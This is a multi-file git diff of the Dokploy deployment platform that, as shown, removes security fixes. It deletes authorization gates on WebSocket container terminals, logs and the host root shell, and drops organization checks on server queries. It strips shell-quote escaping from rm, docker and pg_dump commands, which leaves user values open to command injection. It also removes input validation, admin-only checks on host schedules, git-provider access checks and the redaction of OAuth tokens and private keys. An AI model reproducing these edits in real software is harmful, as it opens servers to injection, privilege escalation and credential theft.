getNodeApps: withPermission("server", "read") getNodeApps: withPermission("server", "read")
@@ -50,16 +32,7 @@ export const swarmRouter = createTRPCRouter({
serverId: z.string().optional(), serverId: z.string().optional(),
}), }),
) )
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.serverId) {
const server = await findServerById(input.serverId);
if (server.organizationId !== ctx.session?.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You are not authorized to access this server",
});
}
}
return getNodeApplications(input.serverId); return getNodeApplications(input.serverId);
}), }),
getAppInfos: withPermission("server", "read") getAppInfos: withPermission("server", "read")
@@ -81,16 +54,7 @@ export const swarmRouter = createTRPCRouter({
serverId: z.string().optional(), serverId: z.string().optional(),
}), }),
) )
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.serverId) {
const server = await findServerById(input.serverId);
if (server.organizationId !== ctx.session?.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You are not authorized to access this server",
});
}
}
return await getApplicationInfo(input.appName, input.serverId); return await getApplicationInfo(input.appName, input.serverId);
}), }),
getContainerStats: withPermission("server", "read") getContainerStats: withPermission("server", "read")

View File

@@ -13,8 +13,6 @@ import { db } from "@dokploy/server/db";
import { import {
createVolumeBackupSchema, createVolumeBackupSchema,
updateVolumeBackupSchema, updateVolumeBackupSchema,
VOLUME_NAME_MESSAGE,
VOLUME_NAME_REGEX,
volumeBackups, volumeBackups,
} from "@dokploy/server/db/schema"; } from "@dokploy/server/db/schema";
import { findDestinationById } from "@dokploy/server/services/destination"; import { findDestinationById } from "@dokploy/server/services/destination";
@@ -277,10 +275,7 @@ export const volumeBackupsRouter = createTRPCRouter({
z.object({ z.object({
backupFileName: z.string().min(1), backupFileName: z.string().min(1),
destinationId: z.string().min(1), destinationId: z.string().min(1),
volumeName: z volumeName: z.string().min(1),
.string()
.min(1)
.regex(VOLUME_NAME_REGEX, VOLUME_NAME_MESSAGE),
id: z.string().min(1), id: z.string().min(1),
serviceType: z.enum(["application", "compose"]), serviceType: z.enum(["application", "compose"]),
serverId: z.string().optional(), serverId: z.string().optional(),

View File

@@ -1,89 +0,0 @@
import { getAccessibleServerIds } from "@dokploy/server";
import {
checkServiceAccess,
findMemberByUserId,
hasPermission,
} from "@dokploy/server/services/permission";
type WssUser = { id: string } | null | undefined;
type WssSession = { activeOrganizationId?: string | null } | null | undefined;
const buildCtx = (user: { id: string }, activeOrganizationId: string) => ({
user: { id: user.id },
session: { activeOrganizationId },
});
// Authorizes docker/container operations opened over a WebSocket (container
// terminal, container logs, container stats). Requires the docker permission
// (owner/admin, or a member explicitly granted canAccessToDocker) and, for a
// remote server, that the server is accessible to the caller. Previously these
// handlers only checked session + organization, so any member could reach a
// root shell / logs of any container.
export const canAccessDockerOverWss = async (
user: WssUser,
session: WssSession,
serverId?: string | null,
serviceId?: string | null,
): Promise<boolean> => {
if (!user || !session?.activeOrganizationId) return false;
const ctx = buildCtx(user, session.activeOrganizationId);
// When the container belongs to a specific Dokploy service (opened from a
// service page, so serviceId is present), access to that service is the
// authoritative gate — matching the service tRPC endpoints (e.g.
// application.readLogs, which check service access only). A member granted
// the service can read its logs / open its terminal even without the broad
// "docker" permission or explicit access to the server it runs on.
if (serviceId) {
try {
await checkServiceAccess(ctx, serviceId, "read");
return true;
} catch {
return false;
}
}
// Generic Docker overview (no service context): mirror the docker tRPC router
// — require the docker permission and access to the target server.
if (!(await hasPermission(ctx, { docker: ["read"] }))) return false;
if (serverId && serverId !== "local") {
const accessible = await getAccessibleServerIds({
userId: user.id,
activeOrganizationId: session.activeOrganizationId,
});
if (!accessible.has(serverId)) return false;
}
return true;
};
// Authorizes the host/server SSH terminal opened over a WebSocket. The local
// host terminal is a root shell on the control-plane host, so it is restricted
// to owner/admin. A remote server terminal is gated on server access.
export const canAccessTerminalOverWss = async (
user: WssUser,
session: WssSession,
serverId?: string | null,
): Promise<boolean> => {
if (!user || !session?.activeOrganizationId) return false;
if (serverId && serverId !== "local") {
const accessible = await getAccessibleServerIds({
userId: user.id,
activeOrganizationId: session.activeOrganizationId,
});
return accessible.has(serverId);
}
try {
const member = await findMemberByUserId(
user.id,
session.activeOrganizationId,
);
return member?.role === "owner" || member?.role === "admin";
} catch {
return false;
}
};

View File

@@ -3,7 +3,6 @@ import { findServerById, IS_CLOUD, validateRequest } from "@dokploy/server";
import { spawn } from "node-pty"; import { spawn } from "node-pty";
import { Client } from "ssh2"; import { Client } from "ssh2";
import { WebSocketServer } from "ws"; import { WebSocketServer } from "ws";
import { canAccessDockerOverWss } from "./authorize";
import { import {
getShell, getShell,
isValidContainerId, isValidContainerId,
@@ -42,7 +41,6 @@ export const setupDockerContainerLogsWebSocketServer = (
const since = url.searchParams.get("since") ?? "all"; const since = url.searchParams.get("since") ?? "all";
const serverId = url.searchParams.get("serverId"); const serverId = url.searchParams.get("serverId");
const runType = url.searchParams.get("runType"); const runType = url.searchParams.get("runType");
const serviceId = url.searchParams.get("serviceId");
const { user, session } = await validateRequest(req); const { user, session } = await validateRequest(req);
if (!containerId) { if (!containerId) {
@@ -76,11 +74,6 @@ export const setupDockerContainerLogsWebSocketServer = (
return; return;
} }
if (!(await canAccessDockerOverWss(user, session, serverId, serviceId))) {
ws.close(4003, "Not authorized");
return;
}
// Set up keep-alive ping mechanism to prevent timeout // Set up keep-alive ping mechanism to prevent timeout
// Send ping every 45 seconds to keep connection alive // Send ping every 45 seconds to keep connection alive
const pingInterval = setInterval(() => { const pingInterval = setInterval(() => {

View File

@@ -3,7 +3,6 @@ import { findServerById, IS_CLOUD, validateRequest } from "@dokploy/server";
import { spawn } from "node-pty"; import { spawn } from "node-pty";
import { Client } from "ssh2"; import { Client } from "ssh2";
import { WebSocketServer } from "ws"; import { WebSocketServer } from "ws";
import { canAccessDockerOverWss } from "./authorize";
import { isValidContainerId, isValidShell } from "./utils"; import { isValidContainerId, isValidShell } from "./utils";
export const setupDockerContainerTerminalWebSocketServer = ( export const setupDockerContainerTerminalWebSocketServer = (
@@ -33,7 +32,6 @@ export const setupDockerContainerTerminalWebSocketServer = (
const containerId = url.searchParams.get("containerId"); const containerId = url.searchParams.get("containerId");
const activeWay = url.searchParams.get("activeWay"); const activeWay = url.searchParams.get("activeWay");
const serverId = url.searchParams.get("serverId"); const serverId = url.searchParams.get("serverId");
const serviceId = url.searchParams.get("serviceId");
const { user, session } = await validateRequest(req); const { user, session } = await validateRequest(req);
if (!containerId) { if (!containerId) {
@@ -60,11 +58,6 @@ export const setupDockerContainerTerminalWebSocketServer = (
ws.close(); ws.close();
return; return;
} }
if (!(await canAccessDockerOverWss(user, session, serverId, serviceId))) {
ws.close(4003, "Not authorized");
return;
}
try { try {
if (serverId) { if (serverId) {
const server = await findServerById(serverId); const server = await findServerById(serverId);

View File

@@ -9,7 +9,6 @@ import {
validateRequest, validateRequest,
} from "@dokploy/server"; } from "@dokploy/server";
import { WebSocketServer } from "ws"; import { WebSocketServer } from "ws";
import { canAccessDockerOverWss } from "./authorize";
export const setupDockerStatsMonitoringSocketServer = ( export const setupDockerStatsMonitoringSocketServer = (
server: http.Server<typeof http.IncomingMessage, typeof http.ServerResponse>, server: http.Server<typeof http.IncomingMessage, typeof http.ServerResponse>,
@@ -45,7 +44,6 @@ export const setupDockerStatsMonitoringSocketServer = (
| "application" | "application"
| "stack" | "stack"
| "docker-compose"; | "docker-compose";
const serviceId = url.searchParams.get("serviceId");
const { user, session } = await validateRequest(req); const { user, session } = await validateRequest(req);
if (!appName) { if (!appName) {
@@ -57,11 +55,6 @@ export const setupDockerStatsMonitoringSocketServer = (
ws.close(); ws.close();
return; return;
} }
if (!(await canAccessDockerOverWss(user, session, null, serviceId))) {
ws.close(4003, "Not authorized");
return;
}
const intervalId = setInterval(async () => { const intervalId = setInterval(async () => {
try { try {
// Special case: when monitoring "dokploy", get host system stats instead of container stats // Special case: when monitoring "dokploy", get host system stats instead of container stats

View File

@@ -9,7 +9,6 @@ import { publicIpv4, publicIpv6 } from "public-ip";
import { Client, type ConnectConfig } from "ssh2"; import { Client, type ConnectConfig } from "ssh2";
import { WebSocketServer } from "ws"; import { WebSocketServer } from "ws";
import { getDockerHost } from "../utils/docker"; import { getDockerHost } from "../utils/docker";
import { canAccessTerminalOverWss } from "./authorize";
import { setupLocalServerSSHKey } from "./utils"; import { setupLocalServerSSHKey } from "./utils";
const COMMAND_TO_ALLOW_LOCAL_ACCESS = ` const COMMAND_TO_ALLOW_LOCAL_ACCESS = `
@@ -94,11 +93,6 @@ export const setupTerminalWebSocketServer = (
return; return;
} }
if (!(await canAccessTerminalOverWss(user, session, serverId))) {
ws.close(4003, "Not authorized");
return;
}
let connectionDetails: ConnectConfig = {}; let connectionDetails: ConnectConfig = {};
const isLocalServer = serverId === "local"; const isLocalServer = serverId === "local";

View File

@@ -57,7 +57,6 @@ export const schedules = pgTable("schedule", {
}); });
export type Schedule = typeof schedules.$inferSelect; export type Schedule = typeof schedules.$inferSelect;
export type ScheduleType = Schedule["scheduleType"];
export const schedulesRelations = relations(schedules, ({ one, many }) => ({ export const schedulesRelations = relations(schedules, ({ one, many }) => ({
application: one(applications, { application: one(applications, {
@@ -79,9 +78,7 @@ export const schedulesRelations = relations(schedules, ({ one, many }) => ({
deployments: many(deployments), deployments: many(deployments),
})); }));
export const createScheduleSchema = createInsertSchema(schedules, { export const createScheduleSchema = createInsertSchema(schedules);
scheduleType: z.enum(["application", "compose", "server", "dokploy-server"]),
});
export const updateScheduleSchema = createScheduleSchema.extend({ export const updateScheduleSchema = createScheduleSchema.extend({
scheduleId: z.string().min(1), scheduleId: z.string().min(1),

View File

@@ -41,12 +41,6 @@ export const APP_NAME_REGEX = /^[a-zA-Z0-9._-]+$/;
export const APP_NAME_MESSAGE = export const APP_NAME_MESSAGE =
"App name can only contain letters, numbers, dots, underscores and hyphens"; "App name can only contain letters, numbers, dots, underscores and hyphens";
/** Docker volume name: must start alphanumeric, then letters/numbers/._- only. Safe for shell. */
export const VOLUME_NAME_REGEX = /^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/;
export const VOLUME_NAME_MESSAGE =
"Volume name must start with a letter or number and contain only letters, numbers, dots, underscores and hyphens";
/** Database password: blocks shell-dangerous characters like $ ! ' " \ / and spaces. */ /** Database password: blocks shell-dangerous characters like $ ! ' " \ / and spaces. */
export const DATABASE_PASSWORD_REGEX = export const DATABASE_PASSWORD_REGEX =
/^[a-zA-Z0-9@#%^&*()_+\-=[\]{}|;:,.<>?~`]*$/; /^[a-zA-Z0-9@#%^&*()_+\-=[\]{}|;:,.<>?~`]*$/;

View File

@@ -14,11 +14,7 @@ import { serviceType } from "./mount";
import { mysql } from "./mysql"; import { mysql } from "./mysql";
import { postgres } from "./postgres"; import { postgres } from "./postgres";
import { redis } from "./redis"; import { redis } from "./redis";
import { import { generateAppName } from "./utils";
generateAppName,
VOLUME_NAME_MESSAGE,
VOLUME_NAME_REGEX,
} from "./utils";
export const volumeBackups = pgTable("volume_backup", { export const volumeBackups = pgTable("volume_backup", {
volumeBackupId: text("volumeBackupId") volumeBackupId: text("volumeBackupId")
@@ -117,9 +113,7 @@ export const volumeBackupsRelations = relations(
}), }),
); );
export const createVolumeBackupSchema = createInsertSchema(volumeBackups, { export const createVolumeBackupSchema = createInsertSchema(volumeBackups).omit({
volumeName: z.string().regex(VOLUME_NAME_REGEX, VOLUME_NAME_MESSAGE),
}).omit({
volumeBackupId: true, volumeBackupId: true,
}); });

View File

@@ -102,24 +102,10 @@ export const findApplicationById = async (applicationId: string) => {
redirects: true, redirects: true,
security: true, security: true,
ports: true, ports: true,
gitlab: { gitlab: true,
columns: { secret: false, accessToken: false, refreshToken: false }, github: true,
}, bitbucket: true,
github: { gitea: true,
columns: {
githubClientSecret: false,
githubPrivateKey: false,
githubWebhookSecret: false,
},
},
bitbucket: { columns: { appPassword: false, apiToken: false } },
gitea: {
columns: {
clientSecret: false,
accessToken: false,
refreshToken: false,
},
},
server: true, server: true,
previewDeployments: true, previewDeployments: true,
registry: { columns: { password: false } }, registry: { columns: { password: false } },

View File

@@ -9,7 +9,6 @@ import {
import { removeDirectoryIfExistsContent } from "@dokploy/server/utils/filesystem/directory"; import { removeDirectoryIfExistsContent } from "@dokploy/server/utils/filesystem/directory";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import { quote } from "shell-quote";
import { stringify } from "yaml"; import { stringify } from "yaml";
import type { z } from "zod"; import type { z } from "zod";
import { encodeBase64 } from "../utils/docker/utils"; import { encodeBase64 } from "../utils/docker/utils";
@@ -64,7 +63,7 @@ export const removeCertificateById = async (certificateId: string) => {
const certDir = path.join(CERTIFICATES_PATH, certificate.certificatePath); const certDir = path.join(CERTIFICATES_PATH, certificate.certificatePath);
if (certificate.serverId) { if (certificate.serverId) {
await execAsyncRemote(certificate.serverId, `rm -rf ${quote([certDir])}`); await execAsyncRemote(certificate.serverId, `rm -rf ${certDir}`);
} else { } else {
await removeDirectoryIfExistsContent(certDir); await removeDirectoryIfExistsContent(certDir);
} }
@@ -109,10 +108,10 @@ const createCertificateFiles = async (certificate: Certificate) => {
const certificateData = encodeBase64(certificate.certificateData); const certificateData = encodeBase64(certificate.certificateData);
const privateKey = encodeBase64(certificate.privateKey); const privateKey = encodeBase64(certificate.privateKey);
const command = ` const command = `
mkdir -p ${quote([certDir])}; mkdir -p ${certDir};
echo "${certificateData}" | base64 -d > ${quote([crtPath])}; echo "${certificateData}" | base64 -d > "${crtPath}";
echo "${privateKey}" | base64 -d > ${quote([keyPath])}; echo "${privateKey}" | base64 -d > "${keyPath}";
echo "${yamlConfig}" > ${quote([configFile])}; echo "${yamlConfig}" > "${configFile}";
`; `;
await execAsyncRemote(certificate.serverId, command); await execAsyncRemote(certificate.serverId, command);

View File

@@ -33,7 +33,6 @@ import { cloneGitlabRepository } from "@dokploy/server/utils/providers/gitlab";
import { getCreateComposeFileCommand } from "@dokploy/server/utils/providers/raw"; import { getCreateComposeFileCommand } from "@dokploy/server/utils/providers/raw";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { encodeBase64 } from "../utils/docker/utils"; import { encodeBase64 } from "../utils/docker/utils";
import { getDokployUrl } from "./admin"; import { getDokployUrl } from "./admin";
@@ -473,7 +472,7 @@ export const startCompose = async (composeId: string) => {
const projectPath = join(COMPOSE_PATH, compose.appName, "code"); const projectPath = join(COMPOSE_PATH, compose.appName, "code");
const path = const path =
compose.sourceType === "raw" ? "docker-compose.yml" : compose.composePath; compose.sourceType === "raw" ? "docker-compose.yml" : compose.composePath;
const baseCommand = `env -i PATH="$PATH" docker compose -p ${quote([compose.appName])} -f ${quote([path])} up -d`; const baseCommand = `env -i PATH="$PATH" docker compose -p ${compose.appName} -f ${path} up -d`;
if (compose.composeType === "docker-compose") { if (compose.composeType === "docker-compose") {
if (compose.serverId) { if (compose.serverId) {
await execAsyncRemote( await execAsyncRemote(

View File

@@ -2,7 +2,6 @@ import {
execAsync, execAsync,
execAsyncRemote, execAsyncRemote,
} from "@dokploy/server/utils/process/execAsync"; } from "@dokploy/server/utils/process/execAsync";
import { quote } from "shell-quote";
export const getContainers = async (serverId?: string | null) => { export const getContainers = async (serverId?: string | null) => {
try { try {
@@ -520,7 +519,7 @@ export const getSwarmNodes = async (serverId?: string) => {
export const getNodeInfo = async (nodeId: string, serverId?: string) => { export const getNodeInfo = async (nodeId: string, serverId?: string) => {
try { try {
const command = `docker node inspect ${quote([nodeId])} --format '{{json .}}'`; const command = `docker node inspect ${nodeId} --format '{{json .}}'`;
let stdout = ""; let stdout = "";
let stderr = ""; let stderr = "";
if (serverId) { if (serverId) {

View File

@@ -119,30 +119,3 @@ export const getAccessibleGitProviderIds = async (session: {
} }
return result; return result;
}; };
/**
* Authorizes read access to a specific git provider for the current session.
* Throws if the provider belongs to a different organization (cross-org IDOR)
* or if the caller is not entitled to it within the active organization.
* Must be called before returning any git-provider record that carries secrets
* (OAuth tokens, app private keys, webhook secrets).
*/
export const assertGitProviderAccess = async (
session: { userId: string; activeOrganizationId: string },
provider: { gitProviderId: string; organizationId: string },
) => {
if (provider.organizationId !== session.activeOrganizationId) {
throw new TRPCError({
code: "NOT_FOUND",
message: "Git provider not found",
});
}
const accessibleIds = await getAccessibleGitProviderIds(session);
if (!accessibleIds.has(provider.gitProviderId)) {
throw new TRPCError({
code: "FORBIDDEN",
message: "You don't have access to this git provider",
});
}
};

View File

@@ -11,7 +11,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, getTableColumns } from "drizzle-orm"; import { eq, getTableColumns } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -141,7 +140,7 @@ export const deployLibsql = async (
if (libsql.serverId) { if (libsql.serverId) {
await execAsyncRemote( await execAsyncRemote(
libsql.serverId, libsql.serverId,
`docker pull ${quote([libsql.dockerImage])}`, `docker pull ${libsql.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -11,7 +11,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, getTableColumns } from "drizzle-orm"; import { eq, getTableColumns } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -146,7 +145,7 @@ export const deployMariadb = async (
if (mariadb.serverId) { if (mariadb.serverId) {
await execAsyncRemote( await execAsyncRemote(
mariadb.serverId, mariadb.serverId,
`docker pull ${quote([mariadb.dockerImage])}`, `docker pull ${mariadb.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -12,7 +12,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, getTableColumns } from "drizzle-orm"; import { eq, getTableColumns } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -161,7 +160,7 @@ export const deployMongo = async (
if (mongo.serverId) { if (mongo.serverId) {
await execAsyncRemote( await execAsyncRemote(
mongo.serverId, mongo.serverId,
`docker pull ${quote([mongo.dockerImage])}`, `docker pull ${mongo.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -18,7 +18,6 @@ import {
} from "@dokploy/server/utils/process/execAsync"; } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, type SQL, sql } from "drizzle-orm"; import { eq, type SQL, sql } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
export type Mount = typeof mounts.$inferSelect; export type Mount = typeof mounts.$inferSelect;
@@ -318,7 +317,7 @@ export const updateFileMount = async (mountId: string) => {
try { try {
const serverId = await getServerId(mount); const serverId = await getServerId(mount);
const encodedContent = encodeBase64(mount.content || ""); const encodedContent = encodeBase64(mount.content || "");
const command = `echo "${encodedContent}" | base64 -d > ${quote([fullPath])}`; const command = `echo "${encodedContent}" | base64 -d > ${fullPath}`;
if (serverId) { if (serverId) {
await execAsyncRemote(serverId, command); await execAsyncRemote(serverId, command);
} else { } else {
@@ -338,7 +337,7 @@ export const deleteFileMount = async (mountId: string) => {
try { try {
const serverId = await getServerId(mount); const serverId = await getServerId(mount);
if (serverId) { if (serverId) {
const command = `rm -rf ${quote([fullPath])}`; const command = `rm -rf ${fullPath}`;
await execAsyncRemote(serverId, command); await execAsyncRemote(serverId, command);
} else { } else {
await removeFileOrDirectory(fullPath); await removeFileOrDirectory(fullPath);

View File

@@ -11,7 +11,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, getTableColumns } from "drizzle-orm"; import { eq, getTableColumns } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -144,7 +143,7 @@ export const deployMySql = async (
if (mysql.serverId) { if (mysql.serverId) {
await execAsyncRemote( await execAsyncRemote(
mysql.serverId, mysql.serverId,
`docker pull ${quote([mysql.dockerImage])}`, `docker pull ${mysql.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -1,7 +1,6 @@
import { join } from "node:path"; import { join } from "node:path";
import { paths } from "@dokploy/server/constants"; import { paths } from "@dokploy/server/constants";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
import { execAsync, execAsyncRemote } from "../utils/process/execAsync"; import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
import { cloneBitbucketRepository } from "../utils/providers/bitbucket"; import { cloneBitbucketRepository } from "../utils/providers/bitbucket";
import { cloneGitRepository } from "../utils/providers/git"; import { cloneGitRepository } from "../utils/providers/git";
@@ -86,7 +85,7 @@ export const readPatchRepoDirectory = async (
serverId?: string | null, serverId?: string | null,
): Promise<DirectoryEntry[]> => { ): Promise<DirectoryEntry[]> => {
// Use git ls-tree to get tracked files only // Use git ls-tree to get tracked files only
const command = `cd ${quote([repoPath])} && git ls-tree -r --name-only HEAD`; const command = `cd "${repoPath}" && git ls-tree -r --name-only HEAD`;
let stdout: string; let stdout: string;
try { try {
@@ -169,7 +168,7 @@ export const readPatchRepoFile = async (
const repoPath = join(PATCH_REPOS_PATH, type, application.appName); const repoPath = join(PATCH_REPOS_PATH, type, application.appName);
const fullPath = join(repoPath, filePath); const fullPath = join(repoPath, filePath);
const command = `cat ${quote([fullPath])}`; const command = `cat "${fullPath}"`;
if (serverId) { if (serverId) {
const result = await execAsyncRemote(serverId, command); const result = await execAsyncRemote(serverId, command);

View File

@@ -11,7 +11,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq, getTableColumns } from "drizzle-orm"; import { eq, getTableColumns } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -156,7 +155,7 @@ export const deployPostgres = async (
if (postgres.serverId) { if (postgres.serverId) {
await execAsyncRemote( await execAsyncRemote(
postgres.serverId, postgres.serverId,
`docker pull ${quote([postgres.dockerImage])}`, `docker pull ${postgres.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -10,7 +10,6 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync"; import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { validUniqueServerAppName } from "./project"; import { validUniqueServerAppName } from "./project";
@@ -111,7 +110,7 @@ export const deployRedis = async (
if (redis.serverId) { if (redis.serverId) {
await execAsyncRemote( await execAsyncRemote(
redis.serverId, redis.serverId,
`docker pull ${quote([redis.dockerImage])}`, `docker pull ${redis.dockerImage}`,
onData, onData,
); );
} else { } else {

View File

@@ -2,7 +2,7 @@ import path from "node:path";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import type { z } from "zod"; import type { z } from "zod";
import { IS_CLOUD, paths } from "../constants"; import { paths } from "../constants";
import { db } from "../db"; import { db } from "../db";
import type { import type {
createScheduleSchema, createScheduleSchema,
@@ -11,51 +11,9 @@ import type {
import { type Schedule, schedules } from "../db/schema/schedule"; import { type Schedule, schedules } from "../db/schema/schedule";
import { encodeBase64 } from "../utils/docker/utils"; import { encodeBase64 } from "../utils/docker/utils";
import { execAsync, execAsyncRemote } from "../utils/process/execAsync"; import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
import { findMemberByUserId } from "./permission";
import { findServerById } from "./server";
export type ScheduleExtended = Awaited<ReturnType<typeof findScheduleById>>; export type ScheduleExtended = Awaited<ReturnType<typeof findScheduleById>>;
// Host-level schedules (server / dokploy-server) run their script as root on the
// host and must stay restricted to owners/admins, regardless of whether the
// request is also tied to a service. Attaching an accessible applicationId must
// not downgrade this to a service-access check.
export const assertHostScheduleAccess = async (
ctx: { user: { id: string }; session: { activeOrganizationId: string } },
scheduleType: Schedule["scheduleType"] | null | undefined,
serverId: string | null | undefined,
) => {
if (scheduleType !== "server" && scheduleType !== "dokploy-server") return;
if (scheduleType === "dokploy-server" && IS_CLOUD) {
throw new TRPCError({
code: "FORBIDDEN",
message: "Host-level schedules are not available in the cloud version.",
});
}
const member = await findMemberByUserId(
ctx.user.id,
ctx.session.activeOrganizationId,
);
if (member.role !== "owner" && member.role !== "admin") {
throw new TRPCError({
code: "FORBIDDEN",
message: "Only owners and admins can manage server-level schedules.",
});
}
if (scheduleType === "server" && serverId) {
const targetServer = await findServerById(serverId);
if (targetServer.organizationId !== ctx.session.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You don't have access to this server.",
});
}
}
};
export const createSchedule = async ( export const createSchedule = async (
input: z.infer<typeof createScheduleSchema>, input: z.infer<typeof createScheduleSchema>,
) => { ) => {

View File

@@ -53,13 +53,8 @@ export const findServerById = async (serverId: string) => {
return currentServer; return currentServer;
}; };
/** // Blanks the SSH private key before a server record is sent to a client
* Removes the SSH private key material from a server record before it is sent // (server-side SSH callers use findServerById directly, unredacted).
* to a client. `findServerById` eagerly loads the `sshKey` relation (needed for
* server-side SSH operations), but the private key must never leave the server:
* no client feature consumes it, and returning it exposed it to any member with
* only `server:read`. Server-side callers keep using `findServerById` directly.
*/
export const redactServerSshKey = < export const redactServerSshKey = <
T extends { sshKey?: { privateKey: string } | null }, T extends { sshKey?: { privateKey: string } | null },
>( >(

View File

@@ -2,7 +2,6 @@ import { logger } from "@dokploy/server/lib/logger";
import type { BackupSchedule } from "@dokploy/server/services/backup"; import type { BackupSchedule } from "@dokploy/server/services/backup";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import { scheduledJobs, scheduleJob } from "node-schedule"; import { scheduledJobs, scheduleJob } from "node-schedule";
import { quote } from "shell-quote";
import { keepLatestNBackups } from "."; import { keepLatestNBackups } from ".";
import { runComposeBackup } from "./compose"; import { runComposeBackup } from "./compose";
import { runLibsqlBackup } from "./libsql"; import { runLibsqlBackup } from "./libsql";
@@ -72,16 +71,16 @@ export const getS3Credentials = (destination: Destination) => {
const { accessKey, secretAccessKey, region, endpoint, provider } = const { accessKey, secretAccessKey, region, endpoint, provider } =
destination; destination;
const rcloneFlags = [ const rcloneFlags = [
`--s3-access-key-id=${quote([accessKey])}`, `--s3-access-key-id="${accessKey}"`,
`--s3-secret-access-key=${quote([secretAccessKey])}`, `--s3-secret-access-key="${secretAccessKey}"`,
`--s3-region=${quote([region])}`, `--s3-region="${region}"`,
`--s3-endpoint=${quote([endpoint])}`, `--s3-endpoint="${endpoint}"`,
"--s3-no-check-bucket", "--s3-no-check-bucket",
"--s3-force-path-style", "--s3-force-path-style",
]; ];
if (provider) { if (provider) {
rcloneFlags.unshift(`--s3-provider=${quote([provider])}`); rcloneFlags.unshift(`--s3-provider="${provider}"`);
} }
if (destination.additionalFlags?.length) { if (destination.additionalFlags?.length) {
@@ -91,16 +90,11 @@ export const getS3Credentials = (destination: Destination) => {
return rcloneFlags; return rcloneFlags;
}; };
// User-controlled values (database name, user, password) are passed to the
// container as environment variables via `docker exec -e VAR=<escaped>` and
// referenced as "$VAR" inside the inner shell, so they never appear in the
// inner command text. The -e value is escaped for the outer shell with
// shell-quote; the inner script is single-quoted and reads the env vars.
export const getPostgresBackupCommand = ( export const getPostgresBackupCommand = (
database: string, database: string,
databaseUser: string, databaseUser: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -i $CONTAINER_ID bash -c 'set -o pipefail; pg_dump -Fc --no-acl --no-owner -h localhost -U "$DB_USER" --no-password "$DB_NAME" | gzip'`; return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; pg_dump -Fc --no-acl --no-owner -h localhost -U ${databaseUser} --no-password '${database}' | gzip"`;
}; };
export const getMariadbBackupCommand = ( export const getMariadbBackupCommand = (
@@ -108,14 +102,14 @@ export const getMariadbBackupCommand = (
databaseUser: string, databaseUser: string,
databasePassword: string, databasePassword: string,
) => { ) => {
